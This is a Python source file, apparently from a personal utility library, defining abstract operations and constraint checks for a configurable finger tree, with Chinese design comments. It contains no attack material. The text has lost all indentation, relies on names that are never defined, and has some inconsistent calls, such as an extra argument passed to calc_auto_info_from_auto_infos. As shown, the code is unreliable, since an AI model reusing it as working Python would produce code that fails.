from seed.math.cut_uint_into_uints import Helper4cut_uint_into_uints, calc_lowerbound_of_inf_compact_domain_rng4cut_uint_into_uints
from seed.ops.IOps4OneMainObjType import _mk_reversed_ops
from seed.for_libs.for_functools.reduce import reduce_with_tmay
from seed.abc.abc import override
from seed.abc.ISingleton import ISingleton
from seed.tiny import echo
from abc import ABC, abstractmethod
import itertools
from collections import namedtuple
import operator
___end_mark_pattern_of_excluded_global_names__9999___ = ...
___end_mark_of_excluded_global_names__0___ = ...
check_mapping
check_int
check_uint
check_strict_sorted
check_int_ge1
check_int_ge2
check_all
check_tuple
check_pair
check_instance
#HHHHH
#HHHHH
class IFingerTreeOps__setting(ABC):
r'''
nd=nen <- nens = node_element_numbers
dg=den <- dens = digit_element_numbers
m = min digit_element_numbers
M = max digit_element_numbers
====outdated, see IFingerTreeOps.__doc__ instead
Node e
= Node {element_seq::tuple<e>{len<-nens}, auto_info}
Digit e
= Digit {element_seq::tuple<e>{len<-dens}, auto_info}
FingerTree depth e
= Line {xnode_seq::tuple<e>{len<-[0..2*m-1]}, auto_info}
| Deep {ldigit::Digit e, mtree::FingerTree (depth+1) (Node e), rdigit::Digit e, auto_info}
#'''
@abstractmethod
def get_sorted_node_element_numbers(sf, /):
'-> sorted tuple<uint>'
@abstractmethod
def get_node_element_number_frozenset(sf, /):
'-> frozenset<uint>'
@abstractmethod
def get_min_max_digit_element_number_pair(sf, /):
'-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
@abstractmethod
def ___split_size__case_digit_seq_digit___(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
def split_size__case_digit_seq_digit(sf, sz, /):
'[2*min digit_element_numbers..] -> {nen:uint} #see:join__tqt/xnode_seq2node_seq__dqd/___split_size__case_digit_seq_digit___'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
check_int(sz, min=2*min_den)
nen2count = type(sf).___split_size__case_digit_seq_digit___(sf, sz)
_ops_check_result_of_split_size__case_digit_seq_digit(sf, sz, nen2count)
return mk_FrozenDict(nen2count)
@abstractmethod
def ___split_size__case_digit_seq___(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
def split_size__case_digit_seq(sf, sz, /):
'[min digit_element_numbers..] -> (den, {nen:uint}) #see: join__qt/mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size/xnode_seq2ldigit_node_seq__qd/___split_size__case_digit_seq___'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
check_int(sz, min=1*min_den)
den, nen2count = type(sf).___split_size__case_digit_seq___(sf, sz)
_ops_check_result_of_split_size__case_digit_seq(sf, sz, den, nen2count)
return (den, mk_FrozenDict(nen2count))
@abstractmethod
def ___split_size__case_seq___(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
def split_size__case_seq(sf, sz, /):
'[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:mk_tree_from_xnode_seq/xnode_seq2ldigit_node_seq_rdigit__q/___split_size__case_seq___'
min_den, max_den = sf.get_min_max_digit_element_number_pair()
check_int(sz, min=2*min_den)
small_den, big_den, nen2count = type(sf).___split_size__case_seq___(sf, sz)
_ops_check_result_of_split_size__case_seq(sf, sz, small_den, big_den, nen2count)
return (small_den, big_den, mk_FrozenDict(nen2count))
@abstractmethod
def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
def _get_num_child_xnode_seq_of_new_node_when_push_overflow(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #to avoid recur by not use _ops_check_overflow_nen #see: get_num_child_xnode_seq_of_new_node_when_push_overflow'
overflow_nen = type(sf).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf)
_ops_check_overflow_nen__part(sf, overflow_nen)
return overflow_nen
def get_num_child_xnode_seq_of_new_node_when_push_overflow(sf, /):
'-> num_child_xnode_seq=overflow_nen::nen #see: ipushL__tree/___get_num_child_xnode_seq_of_new_node_when_push_overflow___'
overflow_nen = type(sf).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf)
_ops_check_overflow_nen(sf, overflow_nen)
return overflow_nen
def _check_nen(sf, nen, /):
check_int_ge2(nen)
nen_set = sf.get_node_element_number_frozenset()
if not nen in nen_set: raise ValueError
def _check_den(sf, den, /):
check_uint(den)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
if not min_den <= den <= max_den: raise ValueError
def _check_len_line_tree(sf, sz0, /):
check_uint(sz0)
min_den, max_den = sf.get_min_max_digit_element_number_pair()
if not sz0 < 2*min_den: raise ValueError
#end of class IFingerTreeOps__setting(ABC):
#HHHHH
def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
r'''
view others/数学/编程/tree/finger_tree.txt
最终约束
#由来 见下面safe
+[2 <= min nd <= max nd <= max dg -min dg]
约束甲
#错:其实可以放宽,因为达到(1+max dg)后,可以拆成多个Node,max dg 不用太大
# 单Node补充,单Node进位
+[min nd <= 2*min dg][nd值可以组成[2*min dg..]的所有值]
约束乙
变量说明:
nd 即 Node 的各种可能大小#下文给出[2..3]
dg 即 Digit 的各种可能大小#下文给出[1..4]
可选方案:
0: nd<-[2,3], dg <-[1..>=4]
1: nd<-[3,4], dg <-[3..>=7]
2: nd<-[2,5], dg <-[2..>=7]
3: nd<-[3,5], dg <-[4..>=9]
4: nd<-[3,4,5], dg <-[2..>=7]
5: nd<-[4,5,6,7], dg <-[2..>=9]
nd<-[4,5,6,7], dg <-[2..10]
2..5..7..10
#'''
check_instance(IFingerTreeOps__setting, finger_tree_ops__setting)
nens = node_element_numbers = finger_tree_ops__setting.get_sorted_node_element_numbers()
if 1:
check_tuple(nens)
check_all(check_int_ge2, nens)
check_strict_sorted(nens)
check_int(len(nens), min=2)
lowbd = calc_lowerbound_of_inf_compact_domain_rng4cut_uint_into_uints(nens)
#check inside gcd==1
nen_set = node_element_number_set = finger_tree_ops__setting.get_node_element_number_frozenset()
if 1:
check_type_is(frozenset, nen_set)
check_all(check_int_ge2, nen_set)
check_len_of(nens, sz=len(nen_set))
if not frozenset(nens) == nen_set: raise ValueError
mM_den_pair = min_max_digit_element_number_pair = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
if 1:
check_pair(mM_den_pair)
check_all(check_int_ge1, mM_den_pair)
check_strict_sorted(mM_den_pair)
min_den, max_den = mM_den_pair
min_nen = min(nens)
max_nen = max(nens)
if not 2 <= min_nen <= max_nen <= max_den - min_den: raise ValueError('约束甲')
if not min_nen <= lowbd <= 2*min_den: raise ValueError('约束乙')
if 1:
def _check_sz2__dqd(sz2, /):
nen2count = finger_tree_ops__setting.split_size__case_digit_seq_digit(sz2)
_check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count)
def _check_sz2__q(sz2, /):
small_den, big_den, nen2count = finger_tree_ops__setting.split_size__case_seq(sz2)
_check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count)
def _check_sz1__dq(sz1, /):
den, nen2count = finger_tree_ops__setting.split_size__case_digit_seq(sz1)
_check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count)
#nen_set = set(nens)
#for i in range(min_nen):
for i in range(sum(nens)):
sz2 = 2*min_den +i
_check_sz2__dqd(sz2)
_check_sz2__q(sz2)
sz1 = 1*min_den +i
_check_sz1__dq(sz1)
###
overflow_nen = finger_tree_ops__setting.get_num_child_xnode_seq_of_new_node_when_push_overflow()
_ops_check_overflow_nen(finger_tree_ops__setting, overflow_nen)
#end of def check_finger_tree_ops__setting(finger_tree_ops__setting:IFingerTreeOps__setting, /):
#HHHHH
#begin of def _ops_check_result_of_...
if 1:
def _check_nen2count(nen_set, sz, nen2count, /):
check_mapping(nen2count)
check_all(check_uint, nen2count.keys())
check_all(check_uint, nen2count.values())
if not len(nen2count) <= len(nen_set): raise ValueError
if not set(nen2count) <= nen_set: raise ValueError
if not sz == sum(nen*count for nen, count in nen2count.items()): raise ValueError
def _ops_check_result_of_split_size__case_digit_seq_digit(finger_tree_ops__setting, sz2, nen2count, /):
nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
check_int(sz2, min=2*min_den)
_check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count)
def _ops_check_result_of_split_size__case_seq(finger_tree_ops__setting, sz2, small_den, big_den, nen2count, /):
nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
check_int(sz2, min=2*min_den)
_check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count)
def _ops_check_result_of_split_size__case_digit_seq(finger_tree_ops__setting, sz1, den, nen2count, /):
nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
check_int(sz1, min=1*min_den)
_check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count)
def _check_result_of_split_size__case_digit_seq_digit(nen_set, sz2, nen2count, /):
_check_nen2count(nen_set, sz2, nen2count)
def _check_result_of_split_size__case_seq(nen_set, min_den, max_den, sz2, small_den, big_den, nen2count, /):
check_uint(small_den)
check_uint(big_den)
if not min_den <= small_den <= big_den <= max_den: raise ValueError
if not small_den + big_den <= sz2: raise ValueError
_check_nen2count(nen_set, sz2 - (small_den + big_den), nen2count)
def _check_result_of_split_size__case_digit_seq(nen_set, min_den, max_den, sz1, den, nen2count, /):
check_uint(den)
if not min_den <= den <= max_den: raise ValueError
if not den <= sz1: raise ValueError
_check_nen2count(nen_set, sz1 - den, nen2count)
def _ops_check_overflow_nen__part(finger_tree_ops__setting, overflow_nen, /):
nen_set = finger_tree_ops__setting.get_node_element_number_frozenset()
check_int_ge2(overflow_nen)
if not overflow_nen in nen_set: raise ValueError
def _ops_check_overflow_nen(finger_tree_ops__setting, overflow_nen, /):
'see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
####overflow_nen = finger_tree_ops__setting.get_num_child_xnode_seq_of_new_node_when_push_overflow()
_ops_check_overflow_nen__part(finger_tree_ops__setting, overflow_nen)
min_den, max_den = finger_tree_ops__setting.get_min_max_digit_element_number_pair()
sz1 = max_den+1 #overflow@ipushL__tree
check_int(sz1, min=1*min_den)
den, nen2count = finger_tree_ops__setting.split_size__case_digit_seq(sz1)
#recur?
check_uint(den)
check_mapping(nen2count)
#if not nen2count == FrozenDict({overflow_nen:1}):raise ValueError
if not len(nen2count) == 1:raise ValueError
if not dict(nen2count) == {overflow_nen:1}:raise ValueError
finger_tree_ops__setting._check_den(den)
if not min_den+1 <= den == sz1-overflow_nen <= max_den-1:raise logic-err
#end of def _ops_check_result_of_...
#HHHHH
class IFingerTreeOps(IFingerTreeOps__setting):
r'''
tree<depth>
= line_tree<depth>
| deep_tree<depth>
line_tree<depth>
= Line (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- [0..2*min_den-1]
deep_tree<depth>
= Deep (depth::uint, ldigit::digit<depth>, mtree::tree<depth+1>, rdigit::digit<depth>, auto_info)
digit<depth>
= Digit (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- [min_den..max_den]
xnode<imay_depth>
| imay_depth == -1 = element
| imay_depth >= 0 = let depth = imay_depth in node<depth>
node<depth>
= Node (depth::uint, xnode_seq::[xnode<depth-1>], auto_info)
where len(xnode_seq) <- nens
element
= Element (user_obj, auto_info)
#'''
@abstractmethod
def ___get_monoid_ops4auto_info___(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
def get_monoid_ops4auto_info(sf, /):
'-> monoid_ops<auto_info>::IMonoidOps #see:___get_monoid_ops4auto_info___'
monoid_ops4auto_info = type(sf).___get_monoid_ops4auto_info___(sf)
check_instance(IMonoidOps, monoid_ops4auto_info)
return monoid_ops4auto_info
@abstractmethod
def ___get_auto_info_from_element___(sf, element, /):
'element -> auto_info #see:get_auto_info_from_element'
def get_auto_info_from_element(sf, element, /):
'element -> auto_info #see:___get_auto_info_from_element___'
sf.careless_check_element(element)
auto_info = type(sf).___get_auto_info_from_element___(sf, element)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___get_auto_info_from_node___(sf, depth, node, /):
'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
def get_auto_info_from_node(sf, depth, node, /):
'depth -> node<depth> -> auto_info #see:___get_auto_info_from_node___'
sf.careless_check_depth_of_node(depth, node)
auto_info = type(sf).___get_auto_info_from_node___(sf, depth, node)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___get_auto_info_from_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
def get_auto_info_from_digit(sf, depth, digit, /):
'depth -> digit<depth> -> auto_info #see:___get_auto_info_from_digit___'
sf.careless_check_depth_of_digit(depth, digit)
auto_info = type(sf).___get_auto_info_from_digit___(sf, depth, digit)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
def get_auto_info_from_line_tree(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> auto_info #see:___get_auto_info_from_line_tree___'
sf.careless_check_depth_of_line_tree(depth, line_tree)
auto_info = type(sf).___get_auto_info_from_line_tree___(sf, depth, line_tree)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
def get_auto_info_from_deep_tree(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> auto_info #see:___get_auto_info_from_deep_tree___'
sf.careless_check_depth_of_deep_tree(depth, deep_tree)
auto_info = type(sf).___get_auto_info_from_deep_tree___(sf, depth, deep_tree)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
def get_num_child_xnode_seq_of_node(sf, depth, node, /):
'depth -> node<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_node___'
sf.careless_check_depth_of_node(depth, node)
num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_node___(sf, depth, node)
nen = num_child_xnode_seq
sf._check_nen(nen)
return num_child_xnode_seq
@abstractmethod
def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
def get_num_child_xnode_seq_of_digit(sf, depth, digit, /):
'depth -> digit<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_digit___'
sf.careless_check_depth_of_digit(depth, digit)
num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_digit___(sf, depth, digit)
den = num_child_xnode_seq
sf._check_den(den)
return num_child_xnode_seq
@abstractmethod
def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
def get_num_child_xnode_seq_of_line_tree(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> num_child_xnode_seq #see:___get_num_child_xnode_seq_of_line_tree___'
sf.careless_check_depth_of_line_tree(depth, line_tree)
num_child_xnode_seq = type(sf).___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree)
sz0 = num_child_xnode_seq
sf._check_len_line_tree(sz0)
return num_child_xnode_seq
# careless_check_... used only in mk_.../unbox_.../get_auto_info_from_.../get_num_child_xnode_seq_of_.../calc_auto_info_from_.../careless_check_...
@abstractmethod
def ___careless_check_auto_info___(sf, auto_info, /):
'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
def careless_check_auto_info(sf, auto_info, /):
'obj{?auto_info} -> (None|raise) #see:___careless_check_auto_info___'
sf.get_monoid_ops4auto_info().careless_check_main_obj(auto_info)
type(sf).___careless_check_auto_info___(sf, auto_info)
@abstractmethod
def careless_check_user_obj(sf, user_obj, /):
'obj{?user_obj} -> (None|raise)'
@abstractmethod
def careless_check_element(sf, element, /):
'obj{?element} -> (None|raise)'
@abstractmethod
def ___careless_check_depth_of_node___(sf, depth, node, /):
'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
def careless_check_depth_of_node(sf, depth, node, /):
'depth -> obj{?node<depth>} -> (None|raise) #see:___careless_check_depth_of_node___'
check_uint(depth)
type(sf).___careless_check_depth_of_node___(sf, depth, node)
@abstractmethod
def ___careless_check_depth_of_digit___(sf, depth, digit, /):
'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
def careless_check_depth_of_digit(sf, depth, digit, /):
'depth -> obj{?digit<depth>} -> (None|raise) #see:___careless_check_depth_of_digit___'
check_uint(depth)
type(sf).___careless_check_depth_of_digit___(sf, depth, digit)
@abstractmethod
def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
def careless_check_depth_of_line_tree(sf, depth, line_tree, /):
'depth -> obj{?line_tree<depth>} -> (None|raise) #see:___careless_check_depth_of_line_tree___'
check_uint(depth)
type(sf).___careless_check_depth_of_line_tree___(sf, depth, line_tree)
@abstractmethod
def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
def careless_check_depth_of_deep_tree(sf, depth, deep_tree, /):
'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:___careless_check_depth_of_deep_tree___'
check_uint(depth)
type(sf).___careless_check_depth_of_deep_tree___(sf, depth, deep_tree)
def careless_check_depth_of_tree(sf, depth, tree, /):
'depth -> obj{?tree<depth>} -> (None|raise)'
check_uint(depth)
#but is_tree_line?? assume tree!!!
if sf._is_tree_line(depth, tree):
sf.careless_check_depth_of_line_tree(depth, tree)
else:
sf.careless_check_depth_of_deep_tree(depth, tree)
def careless_check_depth_of_xnode(sf, depth, xnode, /):
'depth -> obj{?xnode<depth-1>} -> (None|raise)'
check_uint(depth)
if not depth:
sf.careless_check_element(xnode)
else:
node = xnode
sf.careless_check_depth_of_node(depth, node)
def careless_check_depth_of_xnode_seq(sf, depth, xnode_seq, /):
'depth -> obj{?[xnode<depth-1>]} -> (None|raise)'
check_uint(depth)
check_seq(xnode_seq)
for xnode in xnode_seq:
sf.careless_check_depth_of_xnode(depth, xnode)
def calc_auto_info_from_auto_infos(sf, auto_infos, /):
'Iter auto_info -> auto_info'
monoid_ops4auto_info = sf.get_monoid_ops4auto_info()
auto_info = monoid_ops4auto_info.assoc_op0s(auto_infos)
sf.careless_check_auto_info(auto_info)
return auto_info
def calc_auto_info_from_xnode_seq(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> auto_info'
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
auto_infos = (sf.get_auto_info_from_xnode(depth, xnode) for xnode in xnode_seq)
auto_info = sf.calc_auto_info_from_auto_infos(auto_infos)
sf.careless_check_auto_info(auto_info)
return auto_info
@abstractmethod
def ___mk_element__calc_auto_info___(sf, user_obj, /):
'raw user_obj -> boxed element #see:mk_element'
def mk_element(sf, user_obj, /):
'raw user_obj -> boxed element #see:___mk_element__calc_auto_info___'
sf.careless_check_user_obj(user_obj)
element = type(sf).___mk_element__calc_auto_info___(sf, user_obj)
sf.careless_check_element(element)
auto_info = sf.get_auto_info_from_element(element)
sf.careless_check_auto_info(auto_info)
return element
@abstractmethod
def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
def mk_node(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> node<depth> #see:___mk_node__not_auto___'
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
nen = len(xnode_seq)
sf._check_nen(nen)
auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
node = type(sf).___mk_node__not_auto___(sf, depth, xnode_seq, auto_info)
sf.careless_check_depth_of_node(depth, node)
return node
@abstractmethod
def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
def mk_digit(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> digit<depth> #see:___mk_digit__not_auto___'
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
den = len(xnode_seq)
sf._check_den(den)
auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
digit = type(sf).___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info)
sf.careless_check_depth_of_digit(depth, digit)
return digit
@abstractmethod
def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
def mk_line_tree(sf, depth, xnode_seq, /):
'depth -> [xnode<depth-1>] -> line_tree<depth> #see:___mk_line_tree__not_auto___'
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
sz0 = len(xnode_seq)
sf._check_len_line_tree(sz0)
auto_info = sf.calc_auto_info_from_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
line_tree = type(sf).___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info)
sf.careless_check_depth_of_line_tree(depth, line_tree)
return line_tree
@abstractmethod
def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
def mk_deep_tree(sf, depth, ldigit, mtree, rdigit, /):
'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> deep_tree<depth> #see:___mk_deep_tree__not_auto___'
sf.careless_check_depth_of_digit(depth, ldigit)
sf.careless_check_depth_of_digit(depth, rdigit)
sf.careless_check_depth_of_tree(depth+1, mtree)
auto_infoL = sf.get_auto_info_from_digit(depth, ldigit)
auto_infoR = sf.get_auto_info_from_digit(depth, rdigit)
auto_infoM = sf.get_auto_info_from_tree(depth+1, mtree)
auto_infos = [auto_infoL, auto_infoM, auto_infoR]
auto_info = sf.calc_auto_info_from_auto_infos(depth, auto_infos)
sf.careless_check_auto_info(auto_info)
deep_tree = type(sf).___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info)
sf.careless_check_depth_of_deep_tree(depth, deep_tree)
return deep_tree
@abstractmethod
def ___unbox_element___(sf, element, /):
'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
def unbox_element(sf, element, /):
'boxed element -> (raw user_obj, auto_info) #see:___unbox_element___'
sf.careless_check_element(element)
user_obj, auto_info = type(sf).___unbox_element___(sf, element)
sf.careless_check_user_obj(user_obj)
sf.careless_check_auto_info(auto_info)
return user_obj, auto_info
@abstractmethod
def ___unbox_node___(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
def unbox_node(sf, depth, node, /):
'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_node___'
sf.careless_check_depth_of_node(depth, node)
xnode_seq, auto_info = type(sf).___unbox_node___(sf, depth, node)
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
nen = len(xnode_seq)
sf._check_nen(nen)
return xnode_seq, auto_info
@abstractmethod
def ___unbox_digit___(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
def unbox_digit(sf, depth, digit, /):
'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_digit___'
sf.careless_check_depth_of_digit(depth, digit)
xnode_seq, auto_info = type(sf).___unbox_digit___(sf, depth, digit)
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
den = len(xnode_seq)
sf._check_den(den)
return xnode_seq, auto_info
@abstractmethod
def ___unbox_line_tree___(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
def unbox_line_tree(sf, depth, line_tree, /):
'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:___unbox_line_tree___'
sf.careless_check_depth_of_line_tree(depth, line_tree)
xnode_seq, auto_info = type(sf).___unbox_line_tree___(sf, depth, line_tree)
sf.careless_check_depth_of_xnode_seq(depth, xnode_seq)
sf.careless_check_auto_info(auto_info)
sz0 = len(xnode_seq)
sf._check_len_line_tree(sz0)
return xnode_seq, auto_info
@abstractmethod
def ___unbox_deep_tree___(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
def unbox_deep_tree(sf, depth, deep_tree, /):
'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:___unbox_deep_tree___'
sf.careless_check_depth_of_deep_tree(depth, deep_tree)
ldigit, mtree, rdigit, auto_info = type(sf).___unbox_deep_tree___(sf, depth, deep_tree)
sf.careless_check_depth_of_digit(depth, ldigit)
sf.careless_check_depth_of_digit(depth, rdigit)
sf.careless_check_depth_of_tree(depth+1, mtree)
sf.careless_check_auto_info(auto_info)
return ldigit, mtree, rdigit, auto_info
@abstractmethod
def ___is_tree_line___(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
def is_tree_line(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
sf.careless_check_depth_of_tree(depth, tree)
return sf._is_tree_line(depth, tree)
def _is_tree_line(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
b = type(sf).___is_tree_line___(sf, depth, tree)
check_bool(b)
return b
def is_tree_deep(sf, depth, tree, /):
'depth -> tree<depth> -> bool'
return not sf.is_tree_line(depth, tree)
def mk_top_tree_from_user_objs(sf, user_objs, /,*, reverse:bool):
'Iter user_obj -> tree<depth=0> #see:mk_tree_from_xnode_seq/ipushL__top_tree'
depth = 0
if 0:
element_seq = list(map(sf.mk_element, user_objs))
xnode_seq = element_seq
if reverse:
xnode_seq.reverse()
top_tree = sf.mk_tree_from_xnode_seq(depth, xnode_seq)
else:
top_tree = sf.mk_empty_tree(depth)
ipush = sf.ipushL__top_tree if reverse else sf.ipushR__top_tree
for user_obj in user_objs:
top_tree = ipush(top_tree, user_obj)
return top_tree
def iter_user_objs__tree(sf, depth, tree, /,*, reverse:bool):
'depth -> tree<depth> -> Iter user_obj'
if sf.is_tree_line(depth, tree):
return sf.iter_user_objs__line_tree(depth, tree, reverse=reverse)
else:
return sf.iter_user_objs__deep_tree(depth, tree, reverse=reverse)
def iter_user_objs__deep_tree(sf, depth, deep_tree, /,*, reverse:bool):
'depth -> deep_tree<depth> -> Iter user_obj'
(ldigit, mtree, rdigit, auto_info) = sf.unbox_deep_tree(depth, deep_tree)
if reverse:
ldigit, rdigit = rdigit, ldigit
yield from sf.iter_user_objs__digit(depth, ldigit, reverse=reverse)
yield from sf.iter_user_objs__tree(depth+1, mtree, reverse=reverse)
yield from sf.iter_user_objs__digit(depth, rdigit, reverse=reverse)
return
def iter_user_objs__line_tree(sf, depth, line_tree, /,*, reverse:bool):
'depth -> line_tree<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_line_tree(depth, line_tree)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__digit(sf, depth, digit, /,*, reverse:bool):
'depth -> digit<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_digit(depth, digit)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__xnode_seq(sf, depth, xnode_seq, /,*, reverse:bool):
'depth -> [xnode<depth-1>] -> Iter user_obj'
f = reversed if reverse else iter
for xnode in f(xnode_seq):
yield from sf.iter_user_objs__xnode(depth, xnode, reverse=reverse)
def iter_user_objs__xnode(sf, depth, xnode, /,*, reverse:bool):
'depth -> xnode<depth-1> -> Iter user_obj'
check_uint(depth)
if depth:
node = xnode
depth -= 1
return sf.iter_user_objs__node(depth, node, reverse=reverse)
else:
element = xnode
return sf.iter_user_objs__element(element, reverse=reverse)
def iter_user_objs__node(sf, depth, node, /,*, reverse:bool):
'depth -> node<depth> -> Iter user_obj'
xnode_seq, auto_info = sf.unbox_node(depth, node)
return sf.iter_user_objs__xnode_seq(depth, xnode_seq, reverse=reverse)
def iter_user_objs__element(sf, element, /,*, reverse:bool):
'element -> Iter user_obj'
user_obj, auto_info = sf.unbox_element(element)
yield user_obj
return
def mk_empty_tree(sf, depth, /):
'depth -> tree<depth>{len=0}'
empty_tree = sf.mk_line_tree(depth, ())
return empty_tree
def mk_tree(sf, depth, is_deep_tree, payload, /):
'depth -> (is_deep_tree::bool) -> (payload::tuple{see args@mk_deep_tree/mk_line_tree}) -> tree<depth>'
if is_deep_tree:
(ldigit, mtree, rdigit) = payload
deep_tree = sf.mk_deep_tree(depth, ldigit, mtree, rdigit)
new_tree = deep_tree
else:
(xnode_seq,) = payload
line_tree = sf.mk_line_tree(depth, xnode_seq)
new_tree = line_tree
return new_tree
